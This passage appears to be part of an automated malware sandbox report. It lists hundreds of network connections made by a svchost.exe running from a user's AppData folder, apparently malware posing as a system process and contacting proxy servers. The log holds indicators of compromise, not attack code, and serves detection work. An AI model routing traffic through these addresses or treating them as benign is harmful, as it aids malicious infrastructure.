Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 191.97.16.160 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 200.94.96.174 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.231.110.26 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 35.237.210.215 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 190.110.34.243 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 124.163.236.54 7302
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 157.245.157.72 60490
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 190.195.225.34 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 161.97.147.193 43131
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 87.247.251.240 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.214.112.68 32323	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 109.236.47.242 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 94.26.241.120 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 138.36.150.28 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 212.92.204.54 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 38.156.73.61 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 85.113.55.123 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 5.189.163.210 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 41.217.223.145 32650
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 83.220.234.102 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.19.225.70 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 34.49.208.221 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.200.12.81 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 72.10.160.90 25257
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.174.102.127 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.51.112.169 5430
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 116.118.98.9 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.130.106.169 83
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 143.208.152.60 3180
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 172.67.255.224 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 142.4.123.41 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 177.131.29.213 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 44.190.9.65 48100
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.234.55.173 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.200.12.83 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.92.4.113 35528
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 209.14.112.2 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 83.221.222.240 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 209.14.112.3 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.200.12.84 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.38.181.129 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 217.172.122.14 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 35.154.71.72 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 178.33.163.156 42380
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 109.70.189.30 38880
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 173.249.29.243 9123
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 121.205.69.62 21212
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 98.175.31.195 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 72.217.158.202 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.243.102.207 9764
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 109.164.38.189 2306
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 54.233.119.172 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 31.44.82.2 38080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 72.10.160.170 1911
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.21.223.181 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 117.30.118.200 8118
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 60.188.102.225 18080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 109.87.172.133 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 3.128.142.113 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 94.131.63.44 3128	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 72.10.160.173 10677
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 203.154.39.146 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 171.100.22.133 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 72.10.160.171 5369
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 74.207.241.80 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 181.78.95.41 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.191.127.21 8090
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 157.100.6.202 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 181.78.95.40 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 39.108.229.14 8002
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 15.207.196.77 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.127.1.130 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 116.58.227.224 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 181.3.37.213 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 80.169.243.234 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 110.74.195.239 51080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 130.255.162.199 44234
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 3.24.58.156 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 209.97.176.112 11793
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 36.90.223.124 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 120.194.4.157 5443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 154.12.253.232 57447
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 31.207.38.66 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 101.255.165.130 1111
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 148.72.212.212 33905
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.126.173.73 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 62.182.114.164 59623
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 159.192.102.249 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 195.35.32.249 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.222.241.157 27206
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 49.7.11.187 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.219.133.106 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 128.199.221.91 33383
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 141.8.195.143 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.55.26.132 31280
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 178.54.21.203 8081
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 197.248.249.147 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.164.116.172 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 38.7.4.89 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 141.98.248.19 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.4.117.153 5020
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 183.80.130.9 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 160.248.80.91 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 167.99.131.11 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 213.149.103.133 61859
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 117.241.132.95 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.129.199.57 8800
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.77.108.208 9050
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 172.67.105.234 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 93.117.225.195 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.150.151.138 4995
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 163.172.131.178 16379
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.89.16.111 49528
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 192.236.160.186 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 66.171.186.47 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 36.93.68.47 41890
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.128.133.1 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 47.254.198.237 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 195.177.217.131 52858
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 47.242.3.214 8081
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 203.202.253.108 5020
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.172.42.121 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 161.97.173.42 53948
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 190.57.245.250 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 165.227.82.7 24668
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 119.18.149.110 5020
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.109.184.150 56067
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 49.51.93.222 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 114.231.45.178 8089
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 177.72.82.9 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 195.98.93.234 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 177.190.192.57 61221
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.149.194.40 32650
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.17.248.164 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 108.181.132.115 35850
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.137.111.231 8086
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.81.220.33 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 172.67.35.15 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 222.223.103.232 7302
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 146.59.243.214 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 195.110.59.82 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 161.97.173.78 35981
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 31.206.38.46 37630
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 142.54.236.97 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 67.213.210.175 25155
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 148.72.206.250 35703
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 94.23.252.168 9180
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 37.187.91.192 21981
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 64.225.48.234 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.111.160.41 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 107.180.88.41 58037
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 154.79.254.236 32650
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 198.23.176.76 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 124.223.186.186 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 177.234.194.155 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 213.145.137.102 37447
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 140.83.32.175 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 52.73.224.54 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 82.165.105.48 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.214.227.68 60433
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 36.92.77.241 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 70.166.167.38 57728
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 148.72.206.84 2536
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.172.218.164 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.25.64.27 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.207.199.82 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 199.58.185.9 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 207.180.198.241 17228
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.207.199.80 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.240.208.98 43704
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 67.213.210.168 46716
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 61.133.66.69 9002
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 119.13.78.93 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 85.25.177.53 58851
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 5.135.83.214 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.223.239.166 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 142.54.239.1 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.153.154.6 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 149.202.91.219 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 107.181.161.81 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.20.123.164 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 212.237.218.68 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.118.132.180 45449
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 139.129.162.65 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 161.97.163.52 45063
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 189.201.191.75 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 159.65.77.168 8585
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 178.94.231.93 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 41.86.46.112 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 181.143.143.125 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.210.57.243 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 89.249.65.191 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 181.143.143.126 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 14.103.24.20 8000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 92.255.88.219 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 195.78.100.162 3629
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 201.77.96.145 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 192.252.220.89 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 154.236.189.13 1976
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 212.87.255.155 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.241.137.197 42350
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 93.180.222.134 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 172.67.69.9 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 5.9.169.87 30000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 192.145.228.212 8081
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.88.57.203 32650
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.28.121.58 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.15.132.215 16379
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.81.153.162 3389
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.17.213.98 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 89.42.166.163 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.223.239.190 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 177.93.44.53 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.238.228.240 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 192.169.214.249 45108
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.69.90.57 8081
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 213.21.56.20 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 195.178.33.86 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 47.243.114.192 8180
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 41.60.232.18 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 142.93.196.242 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 79.110.196.145 8081
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 98.162.25.29 31679
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 146.83.118.9 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 36.89.10.51 44268
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 121.101.135.46 8089
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 47.90.126.78 8118
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 146.59.2.183 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.194.11.180 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.128.133.239 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.161.99.114 48235
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 70.166.167.55 57745
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 132.148.16.169 11320
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.220.174.99 59967
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 190.4.58.22 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 212.112.125.44 45555
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 80.191.169.69 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 222.255.238.159 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.49.31.207 8081
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.158.77.220 16379
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 114.106.137.152 8089
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.24.136.68 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 128.140.26.12 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.214.225.223 43435
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.222.241.8 36219
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 171.228.159.253 5307
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 43.231.22.229 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 80.228.235.6 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 18.134.236.231 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 119.196.168.183 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 184.178.172.5 15303
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.238.12.4 3128	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.140.189.95 29003
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 83.143.24.66 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.160.207.49 32650
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 68.71.254.6 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 13.81.217.201 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.35.189.217 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 112.196.112.243 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.222.245.41 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 94.45.74.60 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.25.167.88 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 201.71.3.60 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 163.172.147.89 16379
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 13.232.245.132 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.117.109.9 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 41.217.220.214 32650
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.62.235.18 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.105.228.66 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.117.109.5 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 159.65.39.234 7732
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 110.164.175.110 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.223.246.226 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.162.219.10 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 198.101.13.111 25543
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 66.70.197.196 8050
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.21.85.109 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 172.67.181.197 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.144.134.150 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 155.185.15.56 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 154.205.152.96 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 5.78.44.6 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 91.222.198.125 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 94.131.63.120 58378
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 54.36.122.16 29796
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.159.19.213 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 47.111.179.60 8877
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 86.110.189.118 42539
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 201.168.8.74 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.241.50.179 40179
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 142.54.228.193 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 178.207.8.20 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.207.199.87 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 20.169.221.14 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 47.94.83.254 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 27.123.3.141 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 43.157.50.206 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.249.78.25 83
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 200.108.197.2 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 177.8.113.61 50297
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 27.112.70.59 1111
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 201.182.251.142 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 165.227.196.37 63637
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 3.9.71.167 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 194.163.159.94 35081
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.158.124.167 16379
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.118.153.110 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.217.226.43 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 125.25.40.38 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.217.226.44 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.15.133.214 16379
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 88.255.102.114 1082
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.217.226.45 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.125.240.237 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.12.31.3 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.159.60.65 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.169.254.185 2068
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 47.57.115.226 9050
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 204.48.31.203 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 37.187.141.160 2604
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.19.7.53 17979
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 201.251.155.253 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.81.186.179 58630
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.35.111.101 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 52.13.248.29 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 155.50.209.50 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 2.229.249.153 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 115.127.2.230 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 18.135.211.182 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 111.224.11.180 8089
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.174.145.12 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 176.8.230.197 8187
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 35.182.11.156 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.17.16.87 80
